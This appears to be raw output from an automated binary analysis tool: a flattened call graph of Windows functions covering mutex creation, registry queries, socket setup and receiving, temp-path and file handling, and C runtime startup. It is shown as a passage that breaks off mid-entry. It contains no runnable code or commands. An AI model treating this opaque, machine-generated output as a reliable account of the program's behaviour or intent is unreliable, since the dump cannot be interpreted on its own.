76962->77002 76965 5f500036 _wcslen 76964->76965 76967 5f50004b 76965->76967 76968 5f5000ff _memset 76965->76968 76970 5f513f7c 13 API calls 76967->76970 76969 5f4fe124 76968->76969 76973 5f50013b _wcslen 76969->76973 76974 5f500061 _memset 76970->76974 76971 5f4fffab inet_addr 76971->76956 76972 5f4fff72 inet_addr 76975 5f4fff55 76972->76975 76976 5f500150 _memset 76973->76976 76993 5f5001e4 76973->76993 76977 5f513ce4 2 API calls 76974->76977 76975->76971 76975->76972 76978 5f4fffa7 76975->76978 76979 5f513ce4 2 API calls 76976->76979 76988 5f500093 76977->76988 76978->76956 76978->76971 76991 5f500182 76979->76991 76980 5f50020b _wcslen 76980->76944 76981 5f500216 76980->76981 76982 5f513f7c 13 API calls 76981->76982 76983 5f5000b0 inet_addr 76983->76988 76984 5f5000e9 inet_addr 76984->76968 76989 5f5000f5 76984->76989 76986 5f5001d8 inet_addr 76986->76993 76987 5f50019f inet_addr 76987->76991 76988->76983 76988->76984 76992 5f5000e5 76988->76992 76989->76968 76991->76986 76991->76987 76994 5f5001d4 76991->76994 76992->76968 76992->76984 76993->76980 76994->76986 76994->76993 76996 5f4eaf99 76995->76996 76996->76943 76997->76952 76999 5f513fe0 76998->76999 77000 5f513f9b _memset wvnsprintfW 76998->77000 76999->76962 77011 5f513d99 11 API calls 77000->77011 77003 5f513d06 77002->77003 77004 5f513d0a WideCharToMultiByte 77002->77004 77003->76975 77004->77003 77011->76999 77014 5f52dadb 77015 5f52dae6 ___security_init_cookie 77014->77015 77016 5f52daeb 77014->77016 77015->77016 77019 5f52d9e5 77016->77019 77018 5f52daf9 77020 5f52d9f1 __lseeki64 77019->77020 77024 5f52da3e ___DllMainCRTStartup 77020->77024 77025 5f52da8e __lseeki64 77020->77025 77027 5f52d8b0 77020->77027 77022 5f52da6e 77023 5f52d8b0 __CRT_INIT@12 29 API calls 77022->77023 77022->77025 77023->77025 77024->77022 77024->77025 77026 5f52d8b0 __CRT_INIT@12 29 API calls 77024->77026 77025->77018 77026->77022 77028 5f52d93b 77027->77028 77029 5f52d8bf 77027->77029 77031 5f52d972 77028->77031 77038 5f52d941 77028->77038 77056 5f53041e HeapCreate 77029->77056 77032 5f52d9d0 77031->77032 77033 5f52d977 ___set_flsgetvalue __calloc_crt 77031->77033 77035 5f52d9d5 __freeptd 77032->77035 77048 5f52d8ca 77032->77048 77036 5f52d994 __decode_pointer 77033->77036 77033->77048 77035->77048 77043 5f52d9a9 77036->77043 77037 5f52d8d1 __mtinit 77039 5f52d8e1 __RTC_Initialize GetCommandLineA ___crtGetEnvironmentStringsA 77037->77039 77040 5f52d8da __heap_term 77037->77040 77038->77048 77080 5f537fdd DeleteCriticalSection 77038->77080 77058 5f537d86 77039->77058 77040->77048 77043->77048 77051 5f52d9b4 GetCurrentThreadId 77043->77051 77044 5f52d900 77046 5f52d904 __mtterm 77044->77046 77047 5f52d90b __setargv 77044->77047 77045 5f52d966 __mtterm __heap_term 77045->77048 77046->77040 77049 5f52d924 77047->77049 77050 5f52d914 __setenvp 77047->77050 77048->77024 77049->77048 77079 5f537fdd DeleteCriticalSection 77049->77079 77050->77049 77052 5f52d91d 77050->77052 77051->77048 77070 5f5305b1 77052->77070 77055 5f52d939 77055->77046 77057 5f52d8c5 77056->77057 77057->77037 77057->77048 77081 5f52bd0c 77058->77081 77060 5f537d92 GetStartupInfoA __calloc_crt 77061 5f537fd1 __lseeki64 77060->77061 77065 5f537dbd 77060->77065 77061->77044 77062 5f537e38 __calloc_crt 77062->77065 77067 5f537e9b 77062->77067 77063 5f537f4e GetStdHandle 77069 5f537f18 77063->77069 77064 5f537fb3 SetHandleCount 77064->77061 77065->77062 77065->77067 77065->77069 77066 5f537f60 GetFileType 77066->77069 77067->77061 77068 5f537ec4 GetFileType 77067->77068 77067->77069 77068->77067 77069->77061 77069->77063 77069->77064 77069->77066 77071 5f5305bf __IsNonwritableInCurrentImage 77070->77071 77072 5f5305ce 77070->77072 77071->77072 77079->77055 77080->77045 77081->77060 77085 5f4f3ac3 __EH_prolog3 77098 5f50bfae __EH_prolog3 77085->77098 77099 5f50bfc4 77098->77099 77132 5f4d765f GetTickCount 77099->77132 77101 5f50c050 77133 5f4d765f GetTickCount 77101->77133 77103 5f50c05b 77134 5f4d765f GetTickCount 77103->77134 77105 5f50c066 77135 5f4d765f GetTickCount 77105->77135 77107 5f50c071 77136 5f4d765f GetTickCount 77107->77136 77109 5f50c07c 77137 5f4d765f GetTickCount 77109->77137 77111 5f50c087 77138 5f503738 __EH_prolog3 77111->77138 77113 5f50c0f8 77140 5f5057b1 __EH_prolog3 77113->77140 77132->77101 77133->77103 77134->77105 77135->77107 77136->77109 77137->77111 77139 5f503751 77138->77139 77139->77113 77141 5f5057cc 77140->77141 77183 5f4d6e40 GetCurrentProcessId __snwprintf CreateMutexW 77184 5f4d6ec8 GetLastError 77183->77184 77185 5f4d7034 77183->77185 77186 5f4d6ede _memset 77184->77186 77187 5f4d6ed5 WaitForSingleObject 77184->77187 77188 5f4d6f0a 77186->77188 77187->77186 77189 5f4d6f45 GetProcessHeap 77188->77189 77206 5f52db6e _wcslen __getptd_noexit _vscan_fn 77188->77206 77191 5f4d6f4f HeapAlloc 77189->77191 77193 5f4d6f5f 77189->77193 77191->77193 77192 5f4d6f30 77192->77189 77194 5f4d6f38 ReleaseMutex 77192->77194 77195 5f4d6f97 77193->77195 77196 5f4d6f82 __CxxThrowException 77193->77196 77194->77185 77198 5f4d702d CloseHandle 77194->77198 77207 5f52bffc 77195->77207 77196->77195 77198->77185 77200 5f4d6fae 77200->77194 77201 5f4d6fc0 __CxxThrowException 77200->77201 77202 5f4d6d10 77201->77202 77203 5f4d6fda ReleaseMutex 77202->77203 77204 5f4d6fff CloseHandle 77203->77204 77205 5f4d6fee 77203->77205 77204->77205 77206->77192 77208 5f52c029 77207->77208 77209 5f52c00c 77207->77209 77208->77209 77211 5f52c030 __woutput_l 77208->77211 77216 5f52dc8c __getptd_noexit 77209->77216 77213 5f52c060 77211->77213 77214 5f52c06a __flsbuf 77211->77214 77212 5f52c011 77212->77200 77213->77212 77215 5f52c082 __flsbuf 77213->77215 77214->77213 77215->77212 77216->77212 77217 5f51c5df GetTickCount SendMessageW GetTickCount 77218 5f51c62c 77217->77218 77219 5f51c60f 77217->77219 77221 5f513fed 13 API calls 77219->77221 77221->77218 77233 5f501f45 77244 5f4fe53f __EH_prolog3_catch 77233->77244 77235 5f501f58 77236 5f501f61 GetTickCount GetTickCount 77235->77236 77237 5f501f5d 77235->77237 77238 5f501fa0 77236->77238 77239 5f501fb7 77236->77239 77274 5f516dcb RegOpenKeyExW 77238->77274 77263 5f52ac74 77239->77263 77245 5f4fe55a 77244->77245 77246 5f4fe569 __CxxThrowException 77245->77246 77247 5f4fe5ed CreateWaitableTimerW 77245->77247 77298 5f4fdc2f _memset 77245->77298 77246->77245 77248 5f4fe616 SetWaitableTimer 77247->77248 77249 5f4fe600 GetLastError 77247->77249 77251 5f4fe648 CreateMutexW 77248->77251 77252 5f4fe632 GetLastError 77248->77252 77249->77246 77253 5f4fe66e CreateSemaphoreW 77251->77253 77254 5f4fe658 GetLastError 77251->77254 77252->77246 77255 5f4fe69b CreateSemaphoreW 77253->77255 77256 5f4fe685 GetLastError 77253->77256 77254->77246 77257 5f4fe6aa GetLastError 77255->77257 77258 5f4fe6c0 CreateEventW 77255->77258 77256->77255 77257->77258 77259 5f4fe6eb CreateEventW 77258->77259 77260 5f4fe6d5 GetLastError 77258->77260 77261 5f4fe6fa GetLastError 77259->77261 77262 5f4fe710 77259->77262 77260->77259 77261->77262 77262->77235 77264 5f52aca4 ___set_flsgetvalue __calloc_crt 77263->77264 77265 5f52ac88 77263->77265 77267 5f52acbe __getptd 77264->77267 77271 5f52ad08 77264->77271 77299 5f52dc8c __getptd_noexit 77265->77299 77269 5f52accc 77267->77269 77268 5f52ac8d 77268->77237 77270 5f52ace5 CreateThread 77269->77270 77270->77268 77272 5f52acff GetLastError 77270->77272 77301 5f52abf1 ___set_flsgetvalue 77270->77301 77271->77268 77300 5f52dcb2 __getptd_noexit __getptd_noexit _realloc __lseeki64 77271->77300 77272->77271 77275 5f516e04 RegCreateKeyExW 77274->77275 77276 5f501fa5 77274->77276 77275->77276 77277 5f516e21 RegOpenKeyExW 77275->77277 77276->77239 77283 5f517367 77276->77283 77277->77276 77278 5f516e37 RegCreateKeyExW 77277->77278 77278->77276 77279 5f516e58 77278->77279 77279->77276 77280 5f516e5e RegOpenKeyExW 77279->77280 77280->77276 77284 5f51737d 77283->77284 77292 5f517375 77283->77292 77285 5f517383 RegOpenKeyExW 77284->77285 77286 5f51739c 77284->77286 77287 5f5173a8 CreateEventW 77285->77287 77285->77292 77286->77287 77286->77292 77292->77239 77298->77245 77299->77268 77300->77268 78184 16e300 78187 16e230 78184->78187 78186 16e32e 78188 16e240 _memset 78187->78188 78197 162770 CreateFileW 78188->78197 78190 16e2ab 78191 16e2e1 78190->78191 78193 16e2bf 78190->78193 78192 1e4647 _strlwr_s_l_stat 5 API calls 78191->78192 78194 16e2f2 78192->78194 78195 1e4647 _strlwr_s_l_stat 5 API calls 78193->78195 78194->78186 78196 16e2dd 78195->78196 78196->78186 78198 1627b5 78197->78198 78199 162791 78197->78199 78206 162860 78198->78206 78252 168150 92 API calls 78199->78252 78202 1627c5 78204 1627d7 CloseHandle 78202->78204 78205 1627cd CloseHandle 78202->78205 78203 1627ae 78203->78190 78204->78190 78205->78190 78207 1628b8 _memset 78206->78207 78210 1628f1 78207->78210 78278 1e5674 78207->78278 78216 16299d 78210->78216 78253 165690 78210->78253 78211 1629c3 SetLastError 78212 1629cb 78211->78212 78212->78210 78215 1629d7 78212->78215 78213 162b39 78217 162b4a 78213->78217 78222 1e49fc __mtinitlocknum 67 API calls 78213->78222 78296 168150 92 API calls 78215->78296 78216->78213 78221 1e49fc __mtinitlocknum 67 API calls 78216->78221 78218 1e4647 _strlwr_s_l_stat 5 API calls 78217->78218 78223 162b60 78218->78223 78219 16291e 78219->78216 78267 1610a0 78219->78267 78221->78213 78222->78217 78223->78202 78252->78203 78254 1e5674 _malloc 67 API calls 78253->78254 78255 1656a1 78254->78255 78256 1656d2 78255->78256 78257 1656ac SetLastError 78255->78257 78304 164680 78256->78304 78367 168150 92 API calls 78257->78367 78260 1656c5 78260->78219 78401 165b50 GetFileSizeEx 78267->78401 78269 1610cc 78269->78216 78279 1e5686 78278->78279 78280 1e5727 78278->78280 78287 1e56e3 RtlAllocateHeap 78279->78287 78289 1e5697 78279->78289 78290 1e5713 78279->78290 78293 1e5718 78279->78293 78295 1629ba 78279->78295 78453 1e55ab 67 API calls 4 library calls 78279->78453 78454 1f5437 6 API calls __decode_pointer 78279->78454 78457 1f5437 6 API calls __decode_pointer 78280->78457 78282 1e572d 78458 1e98d1 67 API calls __getptd_noexit 78282->78458 78287->78279 78289->78279 78450 1f5630 67 API calls 2 library calls 78289->78450 78451 1f545f 67 API calls 7 library calls 78289->78451 78452 1e70a5 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 78289->78452 78455 1e98d1 67 API calls __getptd_noexit 78290->78455 78456 1e98d1 67 API calls __getptd_noexit 78293->78456 78295->78211 78295->78212 78296->78216 78368 1e4550 78304->78368 78306 1646a6 GetFileSizeEx 78307 1646d6 78306->78307 78308 1646bd 78306->78308 78310 1e5674 _malloc 67 API calls 78307->78310 78370 168150 92 API calls 78308->78370 78311 1646e8 78310->78311 78312 1646f1 SetLastError 78311->78312 78313 1646f9 78311->78313 78312->78313 78316 164b7e 78317 1e49fc __mtinitlocknum 67 API calls 78317->78316 78322 1646ce 78322->78316 78322->78317 78367->78260 78369 1e455c __VEC_memzero 78368->78369 78369->78306 78370->78322 78402 165b7a 78401->78402 78404 165b98 78401->78404 78412 168150 92 API calls 78402->78412 78406 165bc0 SetFilePointerEx 78404->78406 78411 165be4 78404->78411 78405 165b8b 78405->78269 78407 165bd3 78406->78407 78408 165bf1 78406->78408 78411->78269 78412->78405 78450->78289 78451->78289 78453->78279 78454->78279 78455->78293 78456->78295 78457->78282 78458->78295 78459 5f520345 78460 5f52034f 78459->78460 78461 5f5203a2 closesocket 78460->78461 78462 5f52036e 78460->78462 78463 5f5203a0 78460->78463 78461->78463 78466 5f520380 WSAAsyncSelect shutdown 78462->78466 78464 5f5203d7 WSACancelAsyncRequest 78463->78464 78465 5f5203de 78463->78465 78464->78465 78466->78463 78467 5f50c2c7 78468 5f50c2d3 78467->78468 78470 5f50c2e6 78467->78470 78482 5f507556 __EH_prolog3 78468->78482 78471 5f50c348 WSAGetLastError WSAGetLastError 78470->78471 78475 5f50c2e1 78470->78475 78472 5f50c367 78471->78472 78476 5f50c383 78471->78476 78473 5f50c372 WSAGetLastError 78472->78473 78472->78475 78474 5f507556 21 API calls 78473->78474 78474->78475 78476->78475 78477 5f50c3af 78476->78477 78479 5f50c3be 78476->78479 78492 5f50b526 30 API calls 78477->78492 78479->78475 78480 5f50c3e4 GetTickCount GetTickCount 78479->78480 78481 5f50c3b8 78479->78481 78480->78475 78481->78479 78481->78480 78483 5f506afb 78482->78483 78484 5f507578 EnterCriticalSection 78483->78484 78486 5f50758b 78484->78486 78485 5f5075ae LeaveCriticalSection 78487 5f5075bf 78485->78487 78486->78485 78493 5f4eb865 _memset 78487->78493 78489 5f507617 78490 5f513f7c 13 API calls 78489->78490 78491 5f507673 78490->78491 78491->78475 78492->78481 78494 5f52bffc __swprintf 4 API calls 78493->78494 78495 5f4eb8c0 78494->78495 78495->78489 78496 5f508bcb 78499 5f508bdd 78496->78499 78497 5f508d78 78498 5f4eb865 5 API calls 78497->78498 78502 5f508dc3 WSAGetLastError 78498->78502 78499->78497 78500 5f508cbf 78499->78500 78503 5f513f7c 13 API calls 78499->78503 78512 5f51fc9e 78499->78512 78500->78497 78501 5f513f7c 13 API calls 78500->78501 78501->78497 78505 5f513f7c 13 API calls 78502->78505 78503->78499 78506 5f508e2a 78505->78506 78507 5f508e55 GetTickCount GetTickCount GetTickCount 78506->78507 78508 5f508e73 78506->78508 78507->78508 78509 5f508ecc 78508->78509 78510 5f507556 21 API calls 78508->78510 78510->78509 78513 5f51fcb0 recv 78512->78513 78514 5f51fca7 78512->78514 78513->78499 78514->78513 78515 5f5229c9 __EH_prolog3 GetTickCount 78516 5f513f7c 13 API calls 78515->78516 78517 5f5229f1 78516->78517 78518 5f528425 9 API calls 78517->78518 78525 5f522af2 78517->78525 78527 5f522a37 78517->78527 78520 5f522a11 78518->78520 78519 5f528425 9 API calls 78522 5f522a6c 78519->78522 78528 5f52305e 78520->78528 78524 5f52305e 2 API calls 78522->78524 78523 5f4db9b7 403 API calls 78523->78525 78526 5f522a97 78524->78526 78526->78523 78526->78525 78527->78519 78527->78526 78529 5f523078 htonl htons 78528->78529 78530 5f523099 78528->78530 78529->78530 78530->78527 78531 5f516f71 78532 5f516dcb 6 API calls 78531->78532 78533 5f516fb0 78532->78533 78534 5f516fbe RegQueryValueExW 78533->78534 78541 5f516fb7 78533->78541 78535 5f516ff2 RegQueryValueExW 78534->78535 78536 5f516fea 78534->78536 78537 5f517016 78535->78537 78538 5f51701e RegQueryValueExW 78535->78538 78536->78535 78537->78538 78539 5f517042 78538->78539 78540 5f51704a RegQueryValueExW 78538->78540 78539->78540 78542 5f51706e 78540->78542 78543 5f5170aa RegQueryValueExW 78542->78543 78544 5f51707e RegQueryValueExW 78542->78544 78546 5f5170d6 RegQueryValueExW 78543->78546 78547 5f5170ce 78543->78547 78544->78543 78545 5f5170a2 78544->78545 78545->78543 78548 5f5170fa 78546->78548 78549 5f51710c RegQueryValueExW 78546->78549 78547->78546 78548->78549 78550 5f517130 78549->78550 78551 5f517138 RegQueryValueExW 78549->78551 78550->78551 78552 5f517164 RegQueryValueExW 78551->78552 78553 5f51715c 78551->78553 78554 5f5171a6 78552->78554 78556 5f517186 _wcsncpy 78552->78556 78553->78552 78555 5f4d756e 4 API calls 78554->78555 78555->78556 78557 5f549fd7 __wcslwr 10 API calls 78556->78557 78558 5f5171c7 RegQueryValueExW 78557->78558 78559 5f517251 RegCloseKey 78558->78559 78560 5f5171ec RegQueryValueExW 78558->78560 78559->78541 78561 5f517225 RegQueryValueExW 78560->78561 78562 5f51721d 78560->78562 78561->78559 78563 5f517249 78561->78563 78562->78561 78563->78559 78564 5f51c7f0 78565 5f528425 9 API calls 78564->78565 78566 5f51c7fa 78565->78566 78567 5f51c82f PostMessageW 78566->78567 78568 5f522c7a 78569 5f522c8e 78568->78569 78582 5f522d32 78568->78582 78570 5f522cdd 78569->78570 78571 5f513f7c 13 API calls 78569->78571 78569->78582 78572 5f522d39 78570->78572 78575 5f522d2b 78570->78575 78570->78582 78573 5f522cd1 78571->78573 78583 5f522be6 78572->78583 78574 5f525f4c 403 API calls 78573->78574 78574->78570 78594 5f522b06 78575->78594 78579 5f528425 9 API calls 78580 5f522d5e 78579->78580 78588 5f521cb9 78580->78588 78606 5f522675 78583->78606 78586 5f513f7c 13 API calls 78587 5f522c07 GetTickCount 78586->78587 78587->78579 78589 5f521cc0 _memset 78588->78589 78590 5f521cc5 78588->78590 78616 5f51c780 78589->78616 78590->78582 78593 5f523203 78593->78582 78595 5f522b17 78594->78595 78600 5f522b33 78594->78600 78622 5f5226da 78595->78622 78597 5f522b68 78598 5f522b8b 78597->78598 78599 5f5226da 9 API calls 78597->78599 78601 5f5226da 9 API calls 78598->78601 78604 5f522bae 78598->78604 78599->78598 78600->78597 78603 5f5226da 9 API calls 78600->78603 78601->78604 78602 5f522be3 78602->78582 78603->78597 78604->78602 78605 5f5226da 9 API calls 78604->78605 78605->78602 78610 5f5221ac socket 78606->78610 78608 5f52268b closesocket 78609 5f52269e 78608->78609 78609->78586 78611 5f5221d2 _memset htonl htons 78610->78611 78612 5f52222d 78610->78612 78613 5f52220a 78611->78613 78614 5f52221b bind 78611->78614 78612->78608 78613->78614 78615 5f522213 htonl 78613->78615 78614->78612 78615->78614 78617 5f51c792 78616->78617 78618 5f51c78e 78616->78618 78619 5f528425 9 API calls 78617->78619 78618->78593 78620 5f51c799 78619->78620 78621 5f51c7d7 PostMessageW 78620->78621 78621->78618 78623 5f522709 _memset 78622->78623 78631 5f521cca _memset 78623->78631 78626 5f52274f 78633 5f521f26 78626->78633 78632 5f521cef 78631->78632 78632->78626 78676 5f521d5d htons 78633->78676 78635 5f521f51 78636 5f521d5d htons 78635->78636 78637 5f521f5d 78636->78637 78638 5f521f81 78637->78638 78678 5f521dba htons htonl 78637->78678 78639 5f521f98 78638->78639 78679 5f521dba htons htonl 78638->78679 78642 5f521fae 78639->78642 78680 5f521df3 htons htonl 78639->78680 78644 5f521fc5 78642->78644 78681 5f521dba htons htonl 78642->78681 78677 5f521d7c 78676->78677 78677->78635 78678->78638 78679->78639 78680->78642 78681->78644 78701 5f501979 _memset RegQueryValueExW 78702 5f5019c1 _wcsrchr _wcsrchr 78701->78702 78703 5f501a0d RegCloseKey _memset GetTempPathW 78701->78703 78705 5f5019e6 78702->78705 78704 5f4d9134 78703->78704 78706 5f501a58 GetModuleFileNameW _wcsrchr 78704->78706 78705->78703 78707 5f501a8b 78706->78707 78708 5f501acc _memset GetModuleFileNameW _wcslen 78707->78708 78709 5f501b31 _wcsrchr 78708->78709 78710 5f501b0b 78708->78710 78711 5f501b49 78709->78711 78712 5f501b1b _wcslen 78710->78712 78713 5f4e1768 _wcslen 78711->78713 78712->78709 78712->78710 78718 5f501b67 78713->78718 78714 5f501bfa _memset SHGetSpecialFolderPathW 78715 5f501c32 78714->78715 78716 5f501c35 wsprintfW 78714->78716 78715->78716 78717 5f501c57 78716->78717 78732 5f514970 78717->78732 78722 5f501bbe 78718->78722 78755 5f4eb693 __EH_prolog3 78718->78755 78722->78714 78756 5f513c52 78732->78756 78734 5f51497a 78735 5f514996 CreateFileW 78734->78735 78736 5f5149b8 SetFilePointer 78735->78736 78737 5f501c74 _memset 78735->78737 78736->78737 78755->78722 78757 5f513c67 78756->78757 78758 5f513c5c CloseHandle 78756->78758 78757->78734 78758->78757 78759 1d5637 78773 1e5454 78759->78773 78761 1d5643 GetDC 78774 1d548f 78761->78774 78764 1d566e 78767 1d5697 78764->78767 78779 16c8e0 78764->78779 78765 1d565e EnumFontFamiliesW 78765->78764 78768 1d56aa 78767->78768 78770 16c8e0 std::_String_base::_Xlen 69 API calls 78767->78770 78769 1d56bd ReleaseDC CreateFontW 78768->78769 78771 16c8e0 std::_String_base::_Xlen 69 API calls 78768->78771 78772 1d56ed std::_Locinfo::_Locinfo 78769->78772 78770->78768 78771->78769 78773->78761 78775 1e4550 _memset 78774->78775 78776 1d54ba GetVersionExW 78775->78776 78777 1e4647 _strlwr_s_l_stat 5 API calls 78776->78777 78778 1d54e2 78777->78778 78778->78764 78778->78765 78780 16c8f6 78779->78780 78781 16c8e9 78779->78781 78787 16cc80 69 API calls 3 library calls 78780->78787 78786 16cc80 69 API calls 3 library calls 78781->78786 78783 16c8f2 78783->78767 78785 16c917 78785->78767 78786->78783 78787->78785 78788 1ef4b2 78789 1ef4be __mtinitlocknum 78788->78789 78790 1ef4f6 78789->78790 78791 1ef4d6 78789->78791 78792 1ef4eb __mtinitlocknum 78789->78792 78801 1fd28b 78790->78801 78817 1e98d1 67 API calls __getptd_noexit 78791->78817 78796 1ef4db 78818 1ea5b1 6 API calls 2 library calls 78796->78818 78802 1fd2bf EnterCriticalSection 78801->78802 78803 1fd29d 78801->78803 78804 1ef4fe 78802->78804 78803->78802 78805 1fd2a5 78803->78805 78807 1ef350 78804->78807 78806 1f339f __lock 67 API calls 78805->78806 78806->78804 78810 1ef362 78807->78810 78816 1ef383 78807->78816 78808 1ef36e 78826 1e98d1 67 API calls __getptd_noexit 78808->78826 78810->78808 78815 1ef3a1 __Getctype 78810->78815 78810->78816 78811 1ef373 78827 1ea5b1 6 API calls 2 library calls 78811->78827 78815->78816 78820 20158a 78815->78820 78828 1ef04c 78815->78828 78819 1ef52a LeaveCriticalSection LeaveCriticalSection _vprintf_helper 78816->78819 78817->78796 78819->78792 78821 201599 78820->78821 78825 2015ae 78820->78825 78832 1e98d1 67 API calls __getptd_noexit 78821->78832 78823 20159e 78833 1ea5b1 6 API calls 2 library calls 78823->78833 78825->78815 78826->78811 78829 1ef080 78828->78829 78830 1ef065 78828->78830 78829->78815 78830->78829 78831 20158a __fileno 67 API calls 78830->78831 78831->78829 78832->78823 78834 5f51ff7e 78835 5f51ffa8 GetWindowLongW 78834->78835 78836 5f5200c9 78834->78836 78837 5f51ffb5 DefWindowProcW 78835->78837 78842 5f51ffbf 78835->78842 78836->78837 78839 5f52019a GetWindowLongW 78836->78839 78840 5f51ffc6 ctype 78836->78840 78837->78840 78839->78837 78841 5f5201b3 78839->78841 78841->78840 78843 5f5201f6 _memset 78841->78843 78842->78840 78845 5f520086 78842->78845 78846 5f520006 78842->78846 78843->78840 78844 5f520220 78843->78844 78844->78840 78847 5f520226 htons 78844->78847 78845->78840 78858 5f51fec7 ioctlsocket 78845->78858 78846->78840 78857 5f51fec7 ioctlsocket 78846->78857 78853 5f520247 78847->78853 78850 5f52005f 78850->78840 78852 5f520063 WSAGetLastError 78850->78852 78851 5f52009b 78851->78840 78854 5f52009f WSAGetLastError 78851->78854 78852->78840 78853->78840 78855 5f520262 GetLastError 78853->78855 78854->78840 78855->78840 78856 5f520275 GetLastError 78855->78856 78856->78840 78857->78850 78858->78851 78859 183ca8 78862 1e8c13 78859->78862 78861 183cc3 78863 1e8c1f __mtinitlocknum 78862->78863 78864 1e8c27 78863->78864 78865 1e8c42 78863->78865 78959 1e98e4 67 API calls __getptd_noexit 78864->78959 78867 1e8c50 78865->78867 78870 1e8c91 78865->78870 78961 1e98e4 67 API calls __getptd_noexit 78867->78961 78868 1e8c2c 78960 1e98d1 67 API calls __getptd_noexit 78868->78960 78873 1e8c9e 78870->78873 78874 1e8cb2 78870->78874 78872 1e8c55 78962 1e98d1 67 API calls __getptd_noexit 78872->78962 78964 1e98e4 67 API calls __getptd_noexit 78873->78964 78882 1e8cdb 78874->78882 78883 1e8cc5 78874->78883 78876 1e8c5c 78963 1ea5b1 6 API calls 2 library calls 78876->78963 78878 1e8ca3 78965 1e98d1 67 API calls __getptd_noexit 78878->78965 78881 1e8c34 __mtinitlocknum 78881->78861 78966 1e98d1 67 API calls __getptd_noexit 78882->78966 78890 1e8651 78883->78890 78886 1e8cd3 78968 1e8d06 LeaveCriticalSection __unlock_fhandle 78886->78968 78887 1e8ce0 78967 1e98e4 67 API calls __getptd_noexit 78887->78967 78891 1e866d 78890->78891 78892 1e8688 78890->78892 78969 1e98e4 67 API calls __getptd_noexit 78891->78969 78894 1e8697 78892->78894 78896 1e86be 78892->78896 78971 1e98e4 67 API calls __getptd_noexit 78894->78971 78895 1e8672 78970 1e98d1 67 API calls __getptd_noexit 78895->78970 78899 1e86dd 78896->78899 78913 1e86f1 78896->78913 78898 1e869c 78972 1e98d1 67 API calls __getptd_noexit 78898->78972 78974 1e98e4 67 API calls __getptd_noexit 78899->78974 78903 1e8749 78976 1e98e4 67 API calls __getptd_noexit 78903->78976 78904 1e86a3 78973 1ea5b1 6 API calls 2 library calls 78904->78973 78906 1e86e2 78975 1e98d1 67 API calls __getptd_noexit 78906->78975 78908 1e874e 78977 1e98d1 67 API calls __getptd_noexit 78908->78977 78910 1e867a 78910->78886 78912 1e86e9 78978 1ea5b1 6 API calls 2 library calls 78912->78978 78913->78903 78913->78910 78914 1e8725 78913->78914 78915 1e876a 78913->78915 78914->78903 78922 1e8730 ReadFile 78914->78922 78979 1f0596 78915->78979 78920 1e885c 78921 1e8bd7 GetLastError 78920->78921 78929 1e8870 78920->78929 78923 1e8a5d 78921->78923 78924 1e8be4 78921->78924 78922->78920 78922->78921 78938 1e89e2 78923->78938 78991 1e98f7 67 API calls 2 library calls 78923->78991 78993 1e98d1 67 API calls __getptd_noexit 78924->78993 78925 1e8788 78985 1e98d1 67 API calls __getptd_noexit 78925->78985 78926 1e87a6 78987 1ff555 69 API calls 3 library calls 78926->78987 78929->78938 78939 1e888c 78929->78939 78941 1e8aa2 78929->78941 78931 1e8be9 78994 1e98e4 67 API calls __getptd_noexit 78931->78994 78932 1e878d 78986 1e98e4 67 API calls __getptd_noexit 78932->78986 78934 1e87b2 78934->78922 78937 1e49fc __mtinitlocknum 67 API calls 78937->78910 78938->78910 78938->78937 78940 1e88f2 ReadFile 78939->78940 78949 1e896f 78939->78949 78943 1e8910 GetLastError 78940->78943 78952 1e891a 78940->78952 78941->78938 78942 1e8b1a ReadFile 78941->78942 78944 1e8b39 GetLastError 78942->78944 78950 1e8b43 78942->78950 78943->78939 78943->78952 78944->78941 78944->78950 78945 1e8a33 MultiByteToWideChar 78945->78938 78946 1e8a57 GetLastError 78945->78946 78946->78923 78947 1e89dd 78989 1e98d1 67 API calls __getptd_noexit 78947->78989 78948 1e89ea 78955 1e89a7 78948->78955 78956 1e8a21 78948->78956 78949->78938 78949->78947 78949->78948 78949->78955 78950->78941 78992 1ff555 69 API calls 3 library calls 78950->78992 78952->78939 78988 1ff555 69 API calls 3 library calls 78952->78988 78955->78945 78990 1ff555 69 API calls 3 library calls 78956->78990 78958 1e8a30 78958->78945 78959->78868 78960->78881 78961->78872 78962->78876 78964->78878 78965->78876 78966->78887 78967->78886 78968->78881 78969->78895 78970->78910 78971->78898 78972->78904 78974->78906 78975->78912 78976->78908 78977->78912 78981 1f059f 78979->78981 78980 1e5674 _malloc 66 API calls 78980->78981 78981->78980 78982 1e8780 78981->78982 78983 1f05b6 Sleep 78981->78983 78982->78925 78982->78926 78984 1f05cb 78983->78984 78984->78981 78984->78982 78985->78932 78986->78910 78987->78934 78988->78952 78989->78938 78990->78958 78991->78938 78992->78950 78993->78931 78994->78938 78995 1ba5ad 79010 1e5421 78995->79010 78997 1ba5b9 GetParent ShowWindow 79011 1ba3b3 GetClientRect 78997->79011 79010->78997 79025 1b9cbe 79011->79025 79013 1ba438 79014 1ba449 ShowWindow 79013->79014 79015 1ba45e 79014->79015 79026 1b9ccf 79025->79026 79031 18ee0d 79026->79031 79030 1b9d17 79030->79013 79043 18e84d 79031->79043 79034 1b56bd 79067 1777af 79034->79067 79037 1b56df 79039 1b56db 79037->79039 79074 179677 79037->79074 79038 1b56d3 SetLastError 79038->79039 79039->79030 79044 18e85f 79043->79044 79048 18e8dd 79043->79048 79045 18e87c EnterCriticalSection 79044->79045 79044->79048 79046 18e971 79045->79046 79047 18e897 79045->79047 79051 1783c2 LeaveCriticalSection 79046->79051 79049 18e89e GetClassInfoExW 79047->79049 79050 18e905 LoadCursorW 79047->79050 79048->79034 79052 18e8c3 GetClassInfoExW 79049->79052 79053 18e8e4 79049->79053 79050->79053 79051->79048 79052->79053 79054 18e8d5 79052->79054 79056 18e943 GetClassInfoExW 79053->79056 79065 18d630 67 API calls swprintf 79053->79065 79062 1783c2 79054->79062 79056->79046 79059 18e968 79056->79059 79066 18e498 76 API calls 79059->79066 79060 18e93d 79060->79056 79063 1783d7 79062->79063 79064 1783cb LeaveCriticalSection 79062->79064 79063->79048 79064->79063 79065->79060 79066->79046 79068 1777b7 79067->79068 79069 1777c2 79067->79069 79080 1dfcad 16 API calls 79068->79080 79081 177774 GetCurrentProcess FlushInstructionCache 79069->79081 79072 1777bc 79072->79069 79073 1777d1 79072->79073 79073->79037 79073->79038 79075 179687 RaiseException 79074->79075 79076 179696 79074->79076 79075->79076 79076->79075 79077 1796a4 GetCurrentThreadId EnterCriticalSection 79076->79077 79078 1783c2 LeaveCriticalSection 79077->79078 79079 1796d1 CreateWindowExW 79078->79079 79079->79039 79080->79072 79081->79073 79083 1b1e2d 79084 